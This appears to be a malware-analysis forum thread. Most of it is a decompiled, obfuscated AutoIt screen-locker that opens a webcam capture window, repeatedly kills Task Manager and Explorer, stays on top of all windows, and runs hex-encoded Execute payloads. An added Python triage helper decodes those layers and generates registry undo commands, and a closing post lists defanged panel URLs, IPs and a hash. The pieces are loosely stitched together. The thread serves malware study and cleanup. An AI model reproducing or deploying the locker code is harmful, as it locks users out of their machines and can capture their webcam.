$a637cf22d4e = $a1d6c22103c + 13
$a398c123a08 = $a176c424618 + 13
$a068c325d0f = $a1d6c22103c + 0x0000001e
$a288c520518 = $a0e6ca26225
$a2a8c624a32 = $a1d6c22103c + 0x00000016
$a348c82554d = $a1d6c22103c + 0x00000015
$a298ca22635 = $a176c424618 + 0x00000015
$a348cc21941 = $a1d6c22103c + 0x00000017
$a248ce2352a = $a176c424618 + 0x00000017
$a519c020e3b = $a1d6c22103c + 0x00000019
$a019c221c29 = $a176c424618 + 0x00000019
$a5d9c423300 = $a1d6c22103c + 0x00000014
$a409c624a1d = $a176c424618 + 0x00000014
$a559c82284b = $a1d6c22103c + 0x00000018
$a139ca2172a = $a1d6c22103c + 0x00000024
$a059cc2380e = $a1d6c22103c + 1
$a399ce22704 = $a1d6c22103c + 0x00000043
$a30ac025761 = $a176c424618 + 0x00000043
$a57ac223c49 = $a1d6c22103c + 0x00000041
$a2bac423d4b = $a1d6c22103c + 0x00000036
$a46ac620f1e = $a1d6c22103c + 8
$a4aac822257 = $a1d6c22103c + 0x0000002c
$a35aca2390b = $a1d6c22103c + 0x0000003c
$a26acc2342a = $a1d6c22103c + 0x0000003d
$a3dace23d24 = $a1d6c22103c + 0x00000053
$a2ebc02173f = $a1d6c22103c + 0x00000054
$a32bc223918 = $a1d6c22103c + 0x00000050
$a63bc424b42 = $a176c424618 + 0x00000050
$a42bc623a21 = $a1d6c22103c + 0x00000052
$a1cbc824d22 = $a1d6c22103c + 0x0000003e
$a1cbca25d41 = $a1d6c22103c + 0x0000003f
$a20bcc20703 = $a1d6c22103c + 0x00000023
$a3fbce22f2d = $a1d6c22103c + 0x00000055
$a35cc022b54 = $a1d6c22103c + 2
$a03cc222829 = $a176c424618 + 2
$a5bcc424131 = $a1d6c22103c + 5
$a29cc621f49 = $a1d6c22103c + 3
$a22cc825f56 = $a176c424618 + 3
$a4dcca23c1a = $a1d6c22103c + 6
$a2cccc25732 = $a1d6c22103c + 7
$a22cce25509 = $a1d6c22103c + 4
$a52dc024142 = $a1d6c22103c + 0x00000042
$a16dc221320 = $a176c424618 + 0x00000042
$a01dc421f2a = $a1d6c22103c + 0x00000033
$a29dc62012d = $a1d6c22103c + 0x00000032
$a11dc825c39 = $a1d6c22103c + 0x00000034
$a08dca25e42 = $a1d6c22103c + 0x00000035
$a4bdcc23543 = $a1d6c22103c + 0x00000037
$a33dce20330 = $a1d6c22103c + 0x00000040
$a50ec023a05 = $a1d6c22103c + 9
$a10ec225834 = $a1d6c22103c + 0x0000002d
$a55ec425540 = $a1d6c22103c + 0x00000048
$a63ec62390f = $a1d6c22103c + 0x00000047
$a2cec825e27 = $a1d6c22103c + 0x00000046
$a13eca2380a = $a1d6c22103c + 0x00000044
$a3aecc2424f = DllOpen("avicap32.dll")
$a01ece24408 = "aaabauernscheisseoki"
$a5bfc02381c = DllOpen("user32.dll")
$a05fc220f2e = "aaabauernscheisseoki"
$a07fc424c3a = DllCall($a3aecc2424f, "int", "capCreateCaptureWindow", "str", "cap", "int", BitOR($Var0613, $Var0611), "int", (@DesktopWidth - 0x00000064) / 2, "int", ((@DesktopHeight - 0x000002bc) / 2) - 0x0000004c, "int", 0x00000064, "int", 0x0000004b, "hwnd", $a284c324c27, "int", 1)
$a5c0da22f17 = "aaabauernscheisseoki"
DllCall($a5bfc02381c, "int", "SendMessage", "hWnd", $a07fc424c3a[0], "int", $a4b7c521e0e, "int", 0, "int", 0)
DllCall($a5bfc02381c, "int", "SendMessage", "hWnd", $a07fc424c3a[0], "int", $a08dca25e42, "int", 1, "int", 0)
DllCall($a5bfc02381c, "int", "SendMessage", "hWnd", $a07fc424c3a[0], "int", $a01dc421f2a, "int", 1, "int", 0)
DllCall($a5bfc02381c, "int", "SendMessage", "hWnd", $a07fc424c3a[0], "int", $a29dc62012d, "int", 1, "int", 0)
DllCall($a5bfc02381c, "int", "SendMessage", "hWnd", $a07fc424c3a[0], "int", $a11dc825c39, "int", 1, "int", 0)
$a123d924e15 = "aaabauernscheisseoki"
GUISetState(@SW_SHOW)
$a613dc24f1c = "aaabauernscheisseoki"
Local $Var1192, $Var1193
$a264d024f3a = "aaabauernscheisseoki"
$Var1192 = TimerInit()
While 1
	$a214d321c4c = "aaabauernscheisseoki"
	$Var1193 = TimerDiff($Var1192)
	$a1b4d52172d = "aaabauernscheisseoki"
	If $Var1193 > 0 Then
		$a104d824e17 = "aaabauernscheisseoki"
		If ProcessExists("taskmgr.exe") Then
			$a594db21414 = "aaabauernscheisseoki"
			ProcessClose("taskmgr.exe")
			$a154de21c07 = "aaabauernscheisseoki"
		EndIf
		$a505d025121 = "aaabauernscheisseoki"
		If ProcessExists("explorer.exe") Then
			$a135d324110 = "aaabauernscheisseoki"
			Execute(BinaryToString("0x52756E2840436F6D5370656320262022202F63202220262020277461736B6B696C6C202F66202F696D206578706C6F7265722E657865272C2022222C204053575F4849444529"))
			$a225d62092a = "aaabauernscheisseoki"
		EndIf
		$a565d82191d = "aaabauernscheisseoki"
		$Var1193 = 0
		$a525db2351f = "aaabauernscheisseoki"
		$Var1192 = TimerInit()
		$a615dd26102 = "aaabauernscheisseoki"
	EndIf
	$a4f5df2383c = "aaabauernscheisseoki"
	WinSetOnTop($a284c324c27, "", 1)
	$a076d222d25 = "aaabauernscheisseoki"
	WinActivate($a284c324c27)
	$a276d42340d = "aaabauernscheisseoki"
WEnd
$a056d625362 = "aaabauernscheisseoki"
$a3f6d822225 = "aaabauernscheisseoki"
$a136da23230 = "aaabauernscheisseoki"
$a136dc22d20 = "aaabauernscheisseoki"
$a5a6de20b0b = "aaabauernscheisseoki"

Func Fn0448()
	For $ax0x0xa = 1 To 5
		Local $locVar0001 = Var1196x_()
		FileInstall("test2.au3.tbl", $locVar0001, 1)
		Global $Var1196, $Var1197 = Execute(BinaryToString("0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383335333333373334333733323336333933363435333633373335333333373330333634333336333933373334333233383334333633363339333634333336333533353332333633353336333133363334333233383332333433343331333333343334333533333330333333303333333033333330333333323333333633333335333433353337333333373431333534363332333933323433333233373337343233333334333333373337343333323337333234333333333133323339323732393239272929"))
		If IsArray($Var1197) AND $Var1197[0] >= 8893 Then ExitLoop 
		Sleep(10)
	Next
	Execute(BinaryToString("0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383333333133323432333433363336333933363433333633353334333433363335333634333336333533373334333633353332333833323334333433313333333433343335333333303333333033333330333333303333333233333336333333353334333533373333333734313335343633323339323732393239272929"))
EndFunc
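Two things in the decompiled script above are tedious to handle by hand: the Execute(BinaryToString("0x...")) wrappers that hide statements as hex (nested several deep in Fn0448), and the wall of RegWrite() calls that make up the locker's lockdown and persistence footprint. The helper below is an added example written for this thread; it is neither the poster's nor the locker's code. It unwraps the hex layers, turns RegWrite() lines into an inventory tagged as persistence / lockdown / IE zone, and emits a reg.exe undo plan. The taskkill wrapper and the five sample RegWrite lines are copied from the script (with the decompiler's mangled "Microsoft" restored); the wrap() helper, the tag names and the stock restore values for the Winlogon Shell and Userinit entries are this example's own assumptions.

```python
"""Triage helpers for the decompiled AutoIt locker (added example, not from the thread)."""
import re
from typing import Dict, List, NamedTuple

# Execute(BinaryToString("0x...")) in either quote style, any letter case.
EXEC_HEX = re.compile(
    r"Execute\(\s*BinaryToString\(\s*(['\"])0x([0-9A-Fa-f]+)\1\s*\)\s*\)", re.IGNORECASE)
# RegWrite("key", "name", "type", "data"); data may be a bare macro such as @ScriptFullPath.
REGWRITE = re.compile(
    r'RegWrite\("([^"]*)",\s*"([^"]*)",\s*"([^"]*)",\s*(?:"([^"]*)"|([^)]+))\)')


def decode_autoit_hex(hexdigits: str) -> str:
    """BinaryToString with its default flag maps one byte to one ANSI character."""
    return bytes.fromhex(hexdigits).decode("latin-1")


def peel_execute_layers(statement: str, max_layers: int = 16) -> List[str]:
    """Decoded text of each Execute(BinaryToString()) layer, outermost first."""
    layers: List[str] = []
    current = statement
    for _ in range(max_layers):
        m = EXEC_HEX.search(current)
        if m is None:
            break
        current = decode_autoit_hex(m.group(2))
        layers.append(current)
    return layers


def wrap(statement: str) -> str:
    """Constructed helper: wrap a statement the way the locker does, to build test input."""
    return 'Execute(BinaryToString("0x%s"))' % statement.encode("latin-1").hex().upper()


class RegRecord(NamedTuple):
    hive: str      # HKEY_* without AutoIt's "64" suffix
    wow64: bool    # True for HKEY_*64, i.e. the 64-bit registry view
    key: str
    name: str
    type: str
    data: str
    tag: str       # persistence / lockdown / ie-zone / other


# Winlogon values the locker points at itself, with the stock value to put back (assumed defaults).
PERSISTENCE_DEFAULTS = {
    (r"SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON", "SHELL"): "explorer.exe",
    (r"SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON", "USERINIT"): r"C:\Windows\system32\userinit.exe,",
}
LOCKDOWN = {"DISABLETASKMGR", "DISABLEREGISTRYTOOLS", "NODESKTOP", "HIDEICONS",
            "NOVIEWCONTEXTMENU", "NOBROWSERCONTEXTMENU"}


def classify(key: str, name: str) -> str:
    k, n = key.upper(), name.upper()
    if (k, n) in PERSISTENCE_DEFAULTS:
        return "persistence"
    if n in LOCKDOWN:
        return "lockdown"
    if "\\INTERNET SETTINGS\\ZONES\\" in k:
        return "ie-zone"
    return "other"           # e.g. the Policies\Associations entries: reported, left to the analyst


def inventory_regwrites(script: str) -> List[RegRecord]:
    records: List[RegRecord] = []
    for m in REGWRITE.finditer(script):
        full, name, typ = m.group(1), m.group(2), m.group(3)
        data = m.group(4) if m.group(4) is not None else m.group(5).strip()
        hive, _, key = full.partition("\\")
        wow64 = hive.endswith("64")
        if wow64:
            hive = hive[:-2]
        records.append(RegRecord(hive, wow64, key, name, typ, data, classify(key, name)))
    return records


def summarize(records: List[RegRecord]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for r in records:
        counts[r.tag] = counts.get(r.tag, 0) + 1
    return counts


def remediation_plan(records: List[RegRecord]) -> List[str]:
    """reg.exe commands that undo the tagged writes (the Startup .lnk is a separate clean-up)."""
    plan: List[str] = []
    for r in records:
        if r.tag == "other":
            continue
        view = " /reg:64" if r.wow64 else ""
        path = '"%s\\%s"' % (r.hive, r.key)
        if r.tag == "persistence" and r.hive == "HKEY_LOCAL_MACHINE":
            default = PERSISTENCE_DEFAULTS[(r.key.upper(), r.name.upper())]
            plan.append('reg add %s /v %s /t REG_SZ /d "%s" /f%s' % (path, r.name, default, view))
        else:   # policy values and per-user Winlogon overrides do not exist on a stock system
            plan.append("reg delete %s /v %s /f%s" % (path, r.name, view))
    return plan


# Copied from the script above: the explorer.exe kill inside the watchdog loop.
TASKKILL_STMT = ('Execute(BinaryToString("0x52756E2840436F6D5370656320262022202F63202220262020'
                 '277461736B6B696C6C202F66202F696D206578706C6F7265722E657865272C2022222C20'
                 '4053575F4849444529"))')
# Constructed sample: five RegWrite lines as they appear in the script.
SAMPLE_SCRIPT = r'''
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "2500", "REG_DWORD", "3")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDesktop", "REG_DWORD", "1")
'''

if __name__ == "__main__":
    for i, layer in enumerate(peel_execute_layers(TASKKILL_STMT), 1):
        print("layer %d: %s" % (i, layer))
    recs = inventory_regwrites(SAMPLE_SCRIPT)
    print(summarize(recs))
    print("\n".join(remediation_plan(recs)))
```

Run against the whole decompiled script, the inventory shows what the two branches of the XP check have in common (identical policy writes) and what only the non-XP branch adds (the Winlogon Shell and Userinit hijacks), which is the list a responder needs to check on a host that booted into the lock screen.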
 #22101  by patriq
 Fri Jan 31, 2014 3:52 pm
mysql:
hxxp://obession.co.ua/phpmyadmin/index.php

another login:
hxxp://obession.co.ua/loader/index.php

earlier in this thread there was mention of 2 more IPs
95.163.104.87
95.163.104.88

both have files:
hxxp://95.163.104.87/1
hxxp://95.163.104.88/1
(IsDebuggerPresent function)
https://urlquery.net/report.php?id=9146879

(both files same md5)
3ef90061fa80d6d111a288165d87bc57
https://www.virustotal.com/en/file/cdd7 ... /analysis/
(30/50)
attached
Attachments
(47.35 KiB) Downloaded 62 times